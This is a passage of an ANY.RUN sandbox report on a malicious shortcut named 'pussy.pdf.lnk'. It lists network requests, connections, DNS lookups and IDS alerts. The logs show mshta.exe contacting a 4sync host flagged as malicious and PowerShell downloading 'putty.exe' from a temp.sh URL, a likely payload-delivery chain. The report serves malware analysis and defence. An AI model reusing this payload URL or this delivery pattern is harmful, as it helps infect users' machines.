2.23.77.188:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
1672
mshta.exe
GET
200
192.124.249.41:80
http://ocsp.godaddy.com//MEkwRzBFMEMwQTAJBgUrDgMCGgUABBS2CA1fbGt26xPkOKX4ZguoUjM0TgQUQMK9J47MNIMwojPX%2B2yz8LQsgM4CCBQTt66J8t%2BK
unknown
whitelisted
4988
powershell.exe
GET
200
51.91.79.17:80
http://temp.sh/Oefpj/putty.exe
unknown
unknown
7656
SIHClient.exe
GET
200
23.35.229.160:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
7656
SIHClient.exe
GET
200
23.35.229.160:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
6768
Acrobat.exe
GET
200
184.30.131.245:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAfy81yHqHeveu%2FpR5k1Jb0%3D
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
51.124.78.146:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
5496
MoUsoCoreWorker.exe
2.19.11.120:80
crl.microsoft.com
Elisa Oyj
NL
whitelisted
5496
MoUsoCoreWorker.exe
2.23.246.101:80
www.microsoft.com
Ooredoo Q.S.C.
QA
whitelisted
4
System
192.168.100.255:138
whitelisted
3216
svchost.exe
172.211.123.249:443
client.wns.windows.com
MICROSOFT-CORP-MSN-AS-BLOCK
FR
whitelisted
1672
mshta.exe
199.101.134.238:443
www.4sync.com
WZCOM
US
whitelisted
1672
mshta.exe
192.124.249.41:80
ocsp.godaddy.com
SUCURI-SEC
US
whitelisted
1672
mshta.exe
204.155.149.26:443
dc545.4sync.com
WZCOM
US
malicious
6544
svchost.exe
40.126.32.133:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted

DNS requests

Domain
IP
Reputation
google.com
  • 216.58.206.78
whitelisted
settings-win.data.microsoft.com
  • 51.124.78.146
  • 40.127.240.158
whitelisted
crl.microsoft.com
  • 2.19.11.120
  • 2.19.11.105
whitelisted
www.microsoft.com
  • 2.23.246.101
  • 23.35.229.160
whitelisted
client.wns.windows.com
  • 172.211.123.249
  • 172.211.123.250
whitelisted
www.4sync.com
  • 199.101.134.238
  • 204.155.149.140
whitelisted
ocsp.godaddy.com
  • 192.124.249.41
  • 192.124.249.36
  • 192.124.249.24
  • 192.124.249.22
  • 192.124.249.23
whitelisted
dc545.4sync.com
  • 204.155.149.26
malicious
login.live.com
  • 40.126.32.133
  • 20.190.160.14
  • 20.190.160.66
  • 40.126.32.140
  • 20.190.160.128
  • 20.190.160.4
  • 40.126.32.68
  • 40.126.32.74
whitelisted
ocsp.digicert.com
  • 2.23.77.188
  • 184.30.131.245
whitelisted

Threats

PID
Process
Class
Message
2196
svchost.exe
Misc activity
ET FILE_SHARING File Sharing Related Domain in DNS Lookup (4sync .com)
1672
mshta.exe
Misc activity
ET FILE_SHARING Observed File Sharing Related Domain (4sync .com) in TLS SNI
2196
svchost.exe
Misc activity
ET FILE_SHARING File Sharing Related Domain in DNS Lookup (4sync .com)
1672
mshta.exe
Misc activity
ET FILE_SHARING Observed File Sharing Related Domain (4sync .com) in TLS SNI
4988
powershell.exe
Potentially Bad Traffic
ET HUNTING Possibly Suspicious Request for Putty.exe from Non-Standard Download Location
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
pussy.pdf.lnk